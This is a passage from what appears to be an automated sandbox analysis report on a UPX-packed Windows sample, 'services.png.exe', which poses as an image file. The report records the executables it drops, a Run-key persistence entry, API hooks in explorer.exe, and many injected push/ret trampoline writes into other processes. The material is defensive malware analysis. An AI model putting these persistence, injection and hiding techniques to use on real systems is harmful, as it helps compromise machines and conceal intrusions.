                        Source: Binary string: wkernel32.pdb source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nel32.pdb source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .onel32.pdbUGP source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp
                        Source: UIServices[1].exe.1.drStatic PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00421A5A LoadLibraryW,GetProcAddress,FreeLibrary,0_2_00421A5A
                        Source: tmp3809.tmp.0.drStatic PE information: section name: RT
                        Source: tmp3809.tmp.0.drStatic PE information: section name: .mrdata
                        Source: tmp3809.tmp.0.drStatic PE information: section name: .00cfg
                        Source: tmp3858.tmp.0.drStatic PE information: section name: .didat
                        Source: smbhost[1].exe.1.drStatic PE information: section name: .00cfg
                        Source: smbhost.exe.1.drStatic PE information: section name: .00cfg
                        Source: tmp45F4.tmp.1.drStatic PE information: section name: RT
                        Source: tmp45F4.tmp.1.drStatic PE information: section name: .mrdata
                        Source: tmp45F4.tmp.1.drStatic PE information: section name: .00cfg
                        Source: tmp4623.tmp.1.drStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00406834 pushfd ; retf 0_2_00406835
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00415114 push dword ptr [esp+edx-75h]; iretd 0_2_00415118
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00405B6A push edx; retf 0_2_00405B6B
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00407508 pushfd ; ret 0_2_0040750D
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02815B6A push edx; retf 0_2_02815B6B
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02816834 pushfd ; retf 0_2_02816835
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02825114 push dword ptr [esp+edx-75h]; iretd 0_2_02825118
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02817508 pushfd ; ret 0_2_0281750D
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00406834 pushfd ; retf 1_2_00406835
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00405B6A push edx; retf 1_2_00405B6B
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00407508 pushfd ; ret 1_2_0040750D
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD40E5ACDD push rcx; retf 003Fh2_2_000001CD40E5ACDE
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438CC6DD push rcx; retf 003Fh2_2_000001CD438CC6DE
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438FACDD push rcx; retf 003Fh2_2_000001CD438FACDE
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A654ACDD push rcx; retf 003Fh3_2_00000151A654ACDE
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A657C6DD push rcx; retf 003Fh3_2_00000151A657C6DE
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29D077D4 push rsp; iretd 4_2_0000019E29D077E1
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29D0C6DD push rcx; retf 003Fh4_2_0000019E29D0C6DE
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4CACDD push rcx; retf 003Fh5_2_000001F28B4CACDE
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4FC6DD push rcx; retf 003Fh5_2_000001F28B4FC6DE
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B52ACDD push rcx; retf 003Fh5_2_000001F28B52ACDE
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B55C6DD push rcx; retf 003Fh5_2_000001F28B55C6DE
                        Source: C:\Windows\explorer.exeCode function: 6_2_08D4ACDD push rcx; retf 003Fh6_2_08D4ACDE
                        Source: C:\Windows\explorer.exeCode function: 6_2_0908C6DD push rcx; retf 003Fh6_2_0908C6DE
                        Source: C:\Windows\explorer.exeCode function: 6_2_093DACDD push rcx; retf 003Fh6_2_093DACDE
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D594ACDD push rcx; retf 003Fh7_2_00000221D594ACDE
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D597C6DD push rcx; retf 003Fh7_2_00000221D597C6DE
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC6AC6DD push rcx; retf 003Fh9_2_000001ECFC6AC6DE
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D17875C6DD push rcx; retf 003Fh14_2_000001D17875C6DE
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787BC6DD push rcx; retf 003Fh14_2_000001D1787BC6DE
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6121C6DD push rcx; retf 003Fh17_2_0000023B6121C6DE
                        Source: services.png.exeStatic PE information: section name: .text entropy: 7.119341535145941
                        Source: nyheukpo.exe.0.drStatic PE information: section name: .text entropy: 7.119341535145941
                        Source: tmp3809.tmp.0.drStatic PE information: section name: .text entropy: 6.844715065913507
                        Source: tmp45F4.tmp.1.drStatic PE information: section name: .text entropy: 6.844715065913507
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\services.png.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3809.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\services.png.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3858.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4623.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exeJump to dropped file
                        Source: C:\Users\user\Desktop\services.png.exeFile created: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeFile created: C:\Users\user\AppData\Local\Temp\tmp45F4.tmpJump to dropped file

                        Boot Survival

                        barindex
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: C:\Windows\System32\ctfmon.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QicoizhJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QicoizhJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D8FF10 value: 68 B0 B4 42 00 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D6A810 value: 68 20 B5 42 00 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 76F03710 value: 68 37 A4 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 76EDDE80 value: 68 A3 A5 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74DF4100 value: 68 AE A8 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74DF3330 value: 68 33 A9 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75AA4190 value: 68 99 A9 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75A90560 value: 68 B0 A9 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D6EA60 value: 68 13 B9 83 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D758A0 value: 68 4B B9 83 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D6DFF0 value: 68 6C B9 83 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75A8EA50 value: 68 5D 12 82 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75A8E8E0 value: 68 9A 12 82 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75C0B390 value: 68 95 EE 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75C0B400 value: 68 C7 EE 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75BF7D00 value: 68 01 EF 81 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 75509390 value: 68 FE CD 83 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D8FF10 value: 68 B0 B4 83 02 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 74D6A810 value: 68 20 B5 83 02 C3 Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 1460 base: 74D8FF10 value: 68 B0 B4 42 00 C3 Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 1460 base: 74D6A810 value: 68 20 B5 42 00 C3 Jump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 76F03710 value: 68 37 A4 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 76EDDE80 value: 68 A3 A5 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74DF4100 value: 68 AE A8 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74DF3330 value: 68 33 A9 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75AA4190 value: 68 99 A9 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75A90560 value: 68 B0 A9 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74D6EA60 value: 68 13 B9 9B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74D758A0 value: 68 4B B9 9B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74D6DFF0 value: 68 6C B9 9B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75A8EA50 value: 68 5D 12 9A 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75A8E8E0 value: 68 9A 12 9A 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75C0B390 value: 68 95 EE 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75C0B400 value: 68 C7 EE 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75BF7D00 value: 68 01 EF 99 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 75509390 value: 68 FE CD 9B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74D8FF10 value: 68 B0 B4 9B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 74D6A810 value: 68 20 B5 9B 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 76F03710 value: 68 37 A4 E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 76EDDE80 value: 68 A3 A5 E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74DF4100 value: 68 AE A8 E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74DF3330 value: 68 33 A9 E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75AA4190 value: 68 99 A9 E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75A90560 value: 68 B0 A9 E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74D6EA60 value: 68 13 B9 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74D758A0 value: 68 4B B9 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74D6DFF0 value: 68 6C B9 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75A8EA50 value: 68 5D 12 E4 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75A8E8E0 value: 68 9A 12 E4 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75C0B390 value: 68 95 EE E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75C0B400 value: 68 C7 EE E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75BF7D00 value: 68 01 EF E3 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 75509390 value: 68 FE CD E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74D8FF10 value: 68 B0 B4 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 74D6A810 value: 68 20 B5 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 76F03710 value: 68 37 A4 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 76EDDE80 value: 68 A3 A5 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74DF4100 value: 68 AE A8 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74DF3330 value: 68 33 A9 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75AA4190 value: 68 99 A9 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75A90560 value: 68 B0 A9 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74D6EA60 value: 68 13 B9 55 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74D758A0 value: 68 4B B9 55 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74D6DFF0 value: 68 6C B9 55 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75A8EA50 value: 68 5D 12 54 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75A8E8E0 value: 68 9A 12 54 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75C0B390 value: 68 95 EE 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75C0B400 value: 68 C7 EE 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75BF7D00 value: 68 01 EF 53 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 75509390 value: 68 FE CD 55 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74D8FF10 value: 68 B0 B4 55 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 74D6A810 value: 68 20 B5 55 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 76F03710 value: 68 37 A4 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 76EDDE80 value: 68 A3 A5 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74DF4100 value: 68 AE A8 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74DF3330 value: 68 33 A9 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75AA4190 value: 68 99 A9 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75A90560 value: 68 B0 A9 E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74D6EA60 value: 68 13 B9 E7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74D758A0 value: 68 4B B9 E7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74D6DFF0 value: 68 6C B9 E7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75A8EA50 value: 68 5D 12 E6 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75A8E8E0 value: 68 9A 12 E6 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75C0B390 value: 68 95 EE E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75C0B400 value: 68 C7 EE E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75BF7D00 value: 68 01 EF E5 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 75509390 value: 68 FE CD E7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74D8FF10 value: 68 B0 B4 E7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4176 base: 74D6A810 value: 68 20 B5 E7 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 76F03710 value: 68 37 A4 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 76EDDE80 value: 68 A3 A5 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74DF4100 value: 68 AE A8 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 74DF3330 value: 68 33 A9 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75AA4190 value: 68 99 A9 40 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4080 base: 75A90560 value: 68 B0 A9 40 02 C3
